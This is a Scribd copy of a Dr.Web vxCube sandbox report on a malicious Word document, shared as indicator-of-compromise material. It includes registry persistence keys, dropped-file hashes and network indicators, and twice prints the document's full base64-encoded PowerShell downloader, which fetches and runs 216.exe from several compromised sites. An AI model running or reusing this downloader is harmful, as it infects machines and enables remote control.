Scribd Logo
Upload

Welcome to Scribd!

  • Prosegur Ioc Virustotal

    Uploaded by

    kapitan
    0 views9 pages

    Copyright

    © © All Rights Reserved

    Available Formats

    PDF, TXT or read online from Scribd

    Did you find this document useful?

    Is this content inappropriate?

    Report this Document

    Copyright:

    © All Rights Reserved
    Download as PDF, TXT or read online from Scribd
    Flag for inappropriate content
    Download as pdf or txt
    0 views9 pages

    Prosegur Ioc Virustotal

    Uploaded by

    kapitan

    Copyright:

    © All Rights Reserved
    Download as PDF, TXT or read online from Scribd
    Flag for inappropriate content
    Download as pdf or txt
    of 9

    11/27/2019 vxCube — Report

    Estimated result Clean Malware


    Detected Malicious behavior

    Size 226.3 KB
    Format DOC
    SHA1 2e7587c911694df2230b58df19f5295cc556cfb5

    More

    Behavior

    Malicious Launching a process by exploiting the app vulnerability · Sending an HTTP GET
    request to an infection source

    Suspicious Enabling autorun with the shell\open\command registry branches · Enabling


    autorun for a service

    Neutral Creating a window · Using the Windows Management Instrumentation requests ·


    Creating a process with a hidden window · DNS request · Creating a file · Creating a
    process from a recently created file · Moving a file to the %windows% subdirectory ·
    Creating a service · Launching a service · Launching a process · Modifying a system
    file · Sending an HTTP POST request · Possible injection to a system process

    Process graph
    sample known threat malicious module process creation injection
    web query RPC request

    https://vtbehaviour.commondatastorage.googleapis.com/b723c820434ff6cf159518371f9c598dc94d80a5b19a34ba13683dc2b4b563e9_Dr.Web vxCube.html?Go… 1/9


    11/27/2019 vxCube — Report

    process maliciousness
    1 100

    TCP/IP
    hope.ic....org:80 216.exe:3016 se
    powershell.exe:876

    wmiprvse.exe:2284 216.exe:2840 splwow64.exe:1244

    winword.exe:2764

    PID 2764
    Full path %ProgramFiles%\microsoft
    office\office14\winword.exe
    Run parameters /n "<PATH_SAMPLE>.doc"
    Behavior Creating a window

    Description

    To ensure Modifies the following registry keys


    autorun and
    [<HKLM>\Software\Classes\Spiro.Document\shell\open\command] '' =
    distribution
    '%HOMEPATH%\216.exe "%1"'

    [<HKLM>\SOFTWARE\CLASSES\Spiro.Document\shell\open\command] '' =
    '%WINDIR%\SysWOW64\SCALAR~1.EXE "%1"'

    Creates the following services

    [<HKLM>\System\CurrentControlSet\Services\scalarbuilder] 'Start' =
    '00000002'

    [<HKLM>\System\CurrentControlSet\Services\scalarbuilder] 'ImagePath' =
    '"%WINDIR%\SysWOW64\scalarbuilder.exe"'

    Malicious Executes the following (exploit)


    functions
    '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -EncoD
    PAAjACAAQQBwAGEAcABiAGwAbwBmAHUAIABoAHQAdABwAHMAOgAvA
    C8AdwB3AHcALgBtAGkAYwByAG8AcwBvAGYAdAAuAGMAbwBtAC8ARgBjA
    GoAbwBvAHQAbgBiAGQAdQB4ACAAIwA+ACAA JABGAGMAcgBhAHMAcgB

    https://vtbehaviour.commondatastorage.googleapis.com/b723c820434ff6cf159518371f9c598dc94d80a5b19a34ba13683dc2b4b563e9_Dr.Web vxCube.html?Go… 2/9


    11/27/2019 vxCube — Report

    iAHkAaQBjAGsAdwA9ACcATgBpAGIAawBsAHUAcwBsAHAAcwBnACcAOwA
    kAEYAcQBnAHEAcgBiAHUAdQBwAGUAdAAgAD0AIAAnADIAMQA2ACcAOw
    AkAFMAZABtAGMAawBpAGsAegB1AG8AbQA9ACcAUAB4AGEAeQByAHQA
    ZwB6AHMAYwBrAG0A JwA7ACQATgBnAGYAcgBwAGoAbABsAHYAYwBwAH
    UAPQAkAGUAbgB2ADoAdQBzAGUAcgBwAHIAbwBmAGkAbABlACsA JwBc
    ACcAKwAkAEYAcQBnAHEAcgBiAHUAdQBwAGUAdAArACcALgBlAHgAZQAn
    ADsA JABVAG0AeQB1AG4AdgBrAGcAZgBwAGgAbQBtAD0A JwBPAG4AeQB
    oAGEAZABuAHAAdABvAGwA JwA7ACQATABsAGQAdgB1AGUAbABnAHAAY
    QBzAGQAPQAmACgA JwBuAGUAdwAtAG8AYgBqAGUA JwArACcAYwAnACs
    A JwB0ACcAKQAgAG4AZQB0AC4AVwBFAEIAYwBMAEkAZQBuAFQAOwAkAE
    0AdgBkAGoAcwBhAGIAZgB1AG0AdQB6AGsAPQAnAGgAdAB0AHAAOgAvA
    C8AaABvAHAAZQAuAGkAYwByAGkAcwBhAHQALgBvAHIAZwAvAHcAcAAtA
    HMAbgBhAHAAcwBoAG8AdABzAC8AZAAzADcANgB1ADIAdwBvAHAALQB
    5AGcAcwA5AGwAZgB5AC0ANQA2AC8AKgBoAHQAdABwADoALwAvAHQA
    ZQBtAHAALgBzAGEAbABwAGcALgBjAG8AbQAvAHcAcAAtAGEAZABtAGkAb
    gAvAHcANABnAHAAMQBpAHgAdgAwAC0AdABjAHEAbAAtADMAMAA0AD
    QANAAwADYAMQAvACoAaAB0AHQAcABzADoALwAvAHMAawBkAGUAcw
    BpAGcAbgBzAHQAdQBkAGkAbwAuADAAMAAwAHcAZQBiAGgAbwBzAHQ
    AYQBwAHAALgBjAG8AbQAvAHcAcAAtAGEAZABtAGkAbgAvAGgAegBjAGM
    ALQA2ADkAZgBpAC0AMwAzAC8AKgBoAHQAdABwADoALwAvAGQAbwBjA
    HMALgBqAGEAegBlAG4AZQB0AHcAbwByAGsAcwAuAGMAbwBtAC8AdwB
    wAC0AaQBuAGMAbAB1AGQAZQBzAC8ANQBkAGoAYgA4AHAAbwBvAGkA
    LQBwAG4ANwB0AG4AYQBzAHIALQA5ADYAOQA0ADUALwAqAGgAdAB0A
    HAAcwA6AC8ALwBzAHUAcgBlAG4AYQByAG8AcgBhAC4AYwBvAG0ALwBjA
    G8AbgBzAHUAbAB0AGEAdABpAG8AbgAvAG0AYwBvADMAbQBuAGwAeQ
    BwAC0AaQAxAGEALQA0ADEANQA5ADAANAAwADEALwAnAC4AIgBzAGAA
    UABMAEkAVAAiACgA JwAqACcAKQA7ACQAWgBiAGMAcQBhAGkAcABtAHY
    AdAB6AD0A JwBJAHMAbABxAGUAZwBkAGwAZQBwACcAOwBmAG8AcgBl
    AGEAYwBoACgA JABWAHQAawBjAHUAeQB3AHQAIABpAG4AIAAkAE0AdgB
    kAGoAcwBhAGIAZgB1AG0AdQB6AGsAKQB7AHQAcgB5AHsA JABMAGwAZ
    AB2AHUAZQBsAGcAcABhAHMAZAAuACIARABPAHcAbgBMAGAAbwBhAEQ
    AZgBgAGkATABFACIAKAAkAFYAdABrAGMAdQB5AHcAdAAsACAA JABOAGc
    AZgByAHAAagBsAGwAdgBjAHAAdQApADsA JABKAHcAZwB4AGYAZgBiAGY
    AdAA9ACcATQByAGwAZQBuAGIAdAB0ACcAOwBJAGYAIAAoACgALgAoACc
    ARwBlACcAKwAnAHQALQBJAHQAZQAnACsA JwBtACcAKQAgACQATgBnAG
    YAcgBwAGoAbABsAHYAYwBwAHUAKQAuACIAbABgAEUATgBnAGAAVABIA
    CIAIAAtAGcAZQAgADMAOQAzADIAOAApACAAewBbAEQAaQBhAGcAbgBv
    AHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAXQA6ADoAIgBzAFQAY
    QBgAFIAdAAiACgA JABOAGcAZgByAHAAagBsAGwAdgBjAHAAdQApADsA JA
    BVAHYAZQBkAGsAZQBtAGYAdgBtAHEAPQAnAE0AaQBwAHEAbwB4AGMA
    cABjAG8AegB5ACcAOwBiAHIAZQBhAGsAOwAkAFEAagBrAHYAbQBlAHMA
    YgA9ACcAQgB2AHcAdABvAGwAcgB2AGUAdAByAGUA JwB9AH0AYwBhAH
    QAYwBoAHsAfQB9ACQARQBiAHgAYgBzAGcAZgBlAD0A JwBXAHYAawBxAG
    UAaAB6AGwA JwA=

    https://vtbehaviour.commondatastorage.googleapis.com/b723c820434ff6cf159518371f9c598dc94d80a5b19a34ba13683dc2b4b563e9_Dr.Web vxCube.html?Go… 3/9


    11/27/2019 vxCube — Report

    Modifies file Creates the following files


    system
    %HOMEPATH%\216.exe

    Moves the following files

    from %HOMEPATH%\216.exe to %WINDIR%\syswow64\scalarbuilder.exe

    Network activity TCP


    HTTP GET requests

    http://hope.icrisat.org/wp-snapshots/d376u2wop-ygs9lfy-56/

    HTTP POST requests

    http://190.195.148.163/results/ringin/ringin/merge/

    UDP

    DNS ASK hope.icrisat.org

    Miscellaneous Creates and executes the following

    '%HOMEPATH%\216.exe'

    '%WINDIR%\syswow64\scalarbuilder.exe'

    '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -EncoD
    PAAjACAAQQBwAGEAcABiAGwAbwBmAHUAIABoAHQAdABwAHMAOgAvA
    C8AdwB3AHcALgBtAGkAYwByAG8AcwBvAGYAdAAuAGMAbwBtAC8ARgBjA
    GoAbwBvAHQAbgBiAGQAdQB4ACAAIwA+ACAA JABGAGMAcgBhAHMAcgB
    iAHkAaQBjAGsAdwA9ACcATgBpAGIAawBsAHUAcwBsAHAAcwBnACcAOwA
    kAEYAcQBnAHEAcgBiAHUAdQBwAGUAdAAgAD0AIAAnADIAMQA2ACcAOw
    AkAFMAZABtAGMAawBpAGsAegB1AG8AbQA9ACcAUAB4AGEAeQByAHQA
    ZwB6AHMAYwBrAG0A JwA7ACQATgBnAGYAcgBwAGoAbABsAHYAYwBwAH
    UAPQAkAGUAbgB2ADoAdQBzAGUAcgBwAHIAbwBmAGkAbABlACsA JwBc
    ACcAKwAkAEYAcQBnAHEAcgBiAHUAdQBwAGUAdAArACcALgBlAHgAZQAn
    ADsA JABVAG0AeQB1AG4AdgBrAGcAZgBwAGgAbQBtAD0A JwBPAG4AeQB
    oAGEAZABuAHAAdABvAGwA JwA7ACQATABsAGQAdgB1AGUAbABnAHAAY
    QBzAGQAPQAmACgA JwBuAGUAdwAtAG8AYgBqAGUA JwArACcAYwAnACs
    A JwB0ACcAKQAgAG4AZQB0AC4AVwBFAEIAYwBMAEkAZQBuAFQAOwAkAE
    0AdgBkAGoAcwBhAGIAZgB1AG0AdQB6AGsAPQAnAGgAdAB0AHAAOgAvA
    C8AaABvAHAAZQAuAGkAYwByAGkAcwBhAHQALgBvAHIAZwAvAHcAcAAtA
    HMAbgBhAHAAcwBoAG8AdABzAC8AZAAzADcANgB1ADIAdwBvAHAALQB
    5AGcAcwA5AGwAZgB5AC0ANQA2AC8AKgBoAHQAdABwADoALwAvAHQA
    ZQBtAHAALgBzAGEAbABwAGcALgBjAG8AbQAvAHcAcAAtAGEAZABtAGkAb
    gAvAHcANABnAHAAMQBpAHgAdgAwAC0AdABjAHEAbAAtADMAMAA0AD
    QANAAwADYAMQAvACoAaAB0AHQAcABzADoALwAvAHMAawBkAGUAcw
    BpAGcAbgBzAHQAdQBkAGkAbwAuADAAMAAwAHcAZQBiAGgAbwBzAHQ
    AYQBwAHAALgBjAG8AbQAvAHcAcAAtAGEAZABtAGkAbgAvAGgAegBjAGM
    https://vtbehaviour.commondatastorage.googleapis.com/b723c820434ff6cf159518371f9c598dc94d80a5b19a34ba13683dc2b4b563e9_Dr.Web vxCube.html?Go… 4/9
    11/27/2019 vxCube — Report

    ALQA2ADkAZgBpAC0AMwAzAC8AKgBoAHQAdABwADoALwAvAGQAbwBjA
    HMALgBqAGEAegBlAG4AZQB0AHcAbwByAGsAcwAuAGMAbwBtAC8AdwB
    wAC0AaQBuAGMAbAB1AGQAZQBzAC8ANQBkAGoAYgA4AHAAbwBvAGkA
    LQBwAG4ANwB0AG4AYQBzAHIALQA5ADYAOQA0ADUALwAqAGgAdAB0A
    HAAcwA6AC8ALwBzAHUAcgBlAG4AYQByAG8AcgBhAC4AYwBvAG0ALwBjA
    G8AbgBzAHUAbAB0AGEAdABpAG8AbgAvAG0AYwBvADMAbQBuAGwAeQ
    BwAC0AaQAxAGEALQA0ADEANQA5ADAANAAwADEALwAnAC4AIgBzAGAA
    UABMAEkAVAAiACgA JwAqACcAKQA7ACQAWgBiAGMAcQBhAGkAcABtAHY
    AdAB6AD0A JwBJAHMAbABxAGUAZwBkAGwAZQBwACcAOwBmAG8AcgBl
    AGEAYwBoACgA JABWAHQAawBjAHUAeQB3AHQAIABpAG4AIAAkAE0AdgB
    kAGoAcwBhAGIAZgB1AG0AdQB6AGsAKQB7AHQAcgB5AHsA JABMAGwAZ
    AB2AHUAZQBsAGcAcABhAHMAZAAuACIARABPAHcAbgBMAGAAbwBhAEQ
    AZgBgAGkATABFACIAKAAkAFYAdABrAGMAdQB5AHcAdAAsACAA JABOAGc
    AZgByAHAAagBsAGwAdgBjAHAAdQApADsA JABKAHcAZwB4AGYAZgBiAGY
    AdAA9ACcATQByAGwAZQBuAGIAdAB0ACcAOwBJAGYAIAAoACgALgAoACc
    ARwBlACcAKwAnAHQALQBJAHQAZQAnACsA JwBtACcAKQAgACQATgBnAG
    YAcgBwAGoAbABsAHYAYwBwAHUAKQAuACIAbABgAEUATgBnAGAAVABIA
    CIAIAAtAGcAZQAgADMAOQAzADIAOAApACAAewBbAEQAaQBhAGcAbgBv
    AHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAXQA6ADoAIgBzAFQAY
    QBgAFIAdAAiACgA JABOAGcAZgByAHAAagBsAGwAdgBjAHAAdQApADsA JA
    BVAHYAZQBkAGsAZQBtAGYAdgBtAHEAPQAnAE0AaQBwAHEAbwB4AGMA
    cABjAG8AegB5ACcAOwBiAHIAZQBhAGsAOwAkAFEAagBrAHYAbQBlAHMA
    YgA9ACcAQgB2AHcAdABvAGwAcgB2AGUAdAByAGUA JwB9AH0AYwBhAH
    QAYwBoAHsAfQB9ACQARQBiAHgAYgBzAGcAZgBlAD0A JwBXAHYAawBxAG
    UAaAB6AGwA JwA=' (with hidden window)

    Executes the following

    '%WINDIR%\splwow64.exe' 16384

    Created files [35] Dumps [303]


    Path SHA1 Detected

    %APPDATA%\microsoft\templates\nor
    92a6f1190f833f155b40d97e2287a9516c7035c1 —
    mal.dotm

    %APPDATA%\microsoft\windows\recent
    \customdestinations\590aee7bdd69b5 cac439e385e2b8faef5a041804afc628e71fe0db —
    9b.customdestinations-ms

    https://vtbehaviour.commondatastorage.googleapis.com/b723c820434ff6cf159518371f9c598dc94d80a5b19a34ba13683dc2b4b563e9_Dr.Web vxCube.html?Go… 5/9


    11/27/2019 vxCube — Report

    Path SHA1 Detected

    %APPDATA%\microsoft\windows\recent
    \customdestinations\969252ce11249fd adf35643787affe1afb840f0999bf9e679c7ca86 —
    d.customdestinations-ms

    %APPDATA%\microsoft\windows\recent
    \customdestinations\969252ce11249fd
    adf35643787affe1afb840f0999bf9e679c7ca86 —
    d.customdestinations-ms~rf16d17d.tm
    p

    %APPDATA%\microsoft\windows\recent
    \customdestinations\aq3c0sp0xo03mjw cac439e385e2b8faef5a041804afc628e71fe0db —
    7sbwq.temp

    %APPDATA%\microsoft\windows\recent
    \customdestinations\jhn0k7tyon9s8fzsi adf35643787affe1afb840f0999bf9e679c7ca86 —
    qli.temp

    %HOMEPATH%\216.exe 281f0b8bce96c27d12bbce931079bb77e6c7df13 —

    %LOCALAPPDATA%\gdipfontcachev1.da
    c5cc6b48b8a50ef3cd8a3603253670aa9ee8494f —
    t

    %LOCALAPPDATA%\microsoft\windows\
    <INETFILES>\content.mso\233fcb2a.wm 8095738d4cb2c6cd77d02b3d4cd2609196cfc354 —
    f

    %LOCALAPPDATA%\microsoft\windows\
    <INETFILES>\content.mso\2d64e985.w 8095738d4cb2c6cd77d02b3d4cd2609196cfc354 —
    mf

    1 2 3 4 Next page → 1–10 of 35 10

    show all
    API log [640]
    Time Process Event Arguments

    00:00 %WINDIR%\explorer.exe:984:2824 MapSection "Idle":0, BaseAddr = 0x13f6c0000, Vi


    ewSize = 0x15f000, Protect = READ
    WRITE, AllocType = 0, SectionFile '%
    ProgramFiles%\microsoft office\offi
    ce14\winword.exe', SectionName '',
    SectionAttr = SEC_FILE|SEC_IMAGE,
    SectionOffset = 0x0

    https://vtbehaviour.commondatastorage.googleapis.com/b723c820434ff6cf159518371f9c598dc94d80a5b19a34ba13683dc2b4b563e9_Dr.Web vxCube.html?Go… 6/9


    11/27/2019 vxCube — Report

    Time Process Event Arguments

    00:00 %WINDIR%\explorer.exe:984:2824 MapSection "Idle":0, BaseAddr = 0x77070000, Vi


    ewSize = 0x1a9000, Protect = READ
    WRITE, AllocType = 0, SectionFile '<S
    YSTEM32>\ntdll.dll', SectionName '',
    SectionAttr = SEC_FILE|SEC_IMAGE,
    SectionOffset = 0x0

    00:00 %WINDIR%\explorer.exe:984:2824 PreCreateProcess "%ProgramFiles%\microsoft office\o


    ffice14\winword.exe":2764 EntryPoi
    nt = 0x13f6c17c4, Peb = 0x7fffffdc0
    00

    00:00 %WINDIR%\explorer.exe:984:2824 CreateThread "%ProgramFiles%\microsoft office\o


    ffice14\winword.exe":2764 StartAdd
    ress = 0x13f6c17c4, ContextFlags =
    1048587, Parameters = 0x7fffffdc00
    0

    00:00 %WINDIR%\explorer.exe:984:2824 WriteMemory "%ProgramFiles%\microsoft office\o


    ffice14\winword.exe":2764 BaseAdd
    ress = 0x50000, WriteSize = 0x20

    00:00 %WINDIR%\explorer.exe:984:2824 WriteMemory "%ProgramFiles%\microsoft office\o


    ffice14\winword.exe":2764 BaseAdd
    ress = 0x50020, WriteSize = 0x34

    00:00 %WINDIR%\explorer.exe:984:2824 WriteMemory "%ProgramFiles%\microsoft office\o


    ffice14\winword.exe":2764 BaseAdd
    ress = 0x7fffffdc368, WriteSize = 0x
    8

    00:00 %WINDIR%\explorer.exe:984:2620 SetValueKey [<HKCU>\Software\Microsoft\Wind


    ows\CurrentVersion\Explorer\FileEx
    ts\.doc\OpenWithList] 'a' = 'WINWO
    RD.EXE'

    00:00 %WINDIR%\explorer.exe:984:2620 SetValueKey [<HKCU>\Software\Microsoft\Wind


    ows\CurrentVersion\Explorer\FileEx
    ts\.doc\OpenWithList] 'MRUList' =
    'a'

    00:00 %WINDIR%\explorer.exe:984:2824 PostCreateProcess "%ProgramFiles%\microsoft office\o


    ffice14\winword.exe":2764 Comma
    ndLine = '"%ProgramFiles%\Microso
    ft Office\Office14\WINWORD.EXE" /
    n "<PATH_SAMPLE>.doc"' EntryPoin
    t = 0x13f6c17c4 Hash = 70353e0b

    1 2 3 4 5 … 64 Next page → 1–10 of 640 10

    https://vtbehaviour.commondatastorage.googleapis.com/b723c820434ff6cf159518371f9c598dc94d80a5b19a34ba13683dc2b4b563e9_Dr.Web vxCube.html?Go… 7/9


    11/27/2019 vxCube — Report

    Network activity map less than 5 connections


    5-10 connections
    more than 10 connections

    Protocol Address Application-level data

    IP 200.109.58.183:443 —

    HTTP GET http://hope.icrisat.org/wp-snapshots/d376u2wo


    TCP/IP hope.icrisat.org:80
    p-ygs9lfy-56/

    HTTP POST http://190.195.148.163/results/ringin/ringin/m


    TCP/IP 190.195.148.163:80
    erge/

    UDP/IP <DNS_SERVER>:53 DNS ASK hope.icrisat.org

    1–4 of 4 10

    © Doctor Web About vxCube www.drweb.com curenet.drweb.com


    1992 — 2019
    About us estore.drweb.com www.av-desk.com
    Privacy policy free.drweb.com
    https://vtbehaviour.commondatastorage.googleapis.com/b723c820434ff6cf159518371f9c598dc94d80a5b19a34ba13683dc2b4b563e9_Dr.Web vxCube.html?Go… 8/9
    11/27/2019 vxCube — Report

    https://vtbehaviour.commondatastorage.googleapis.com/b723c820434ff6cf159518371f9c598dc94d80a5b19a34ba13683dc2b4b563e9_Dr.Web vxCube.html?Go… 9/9

    You might also like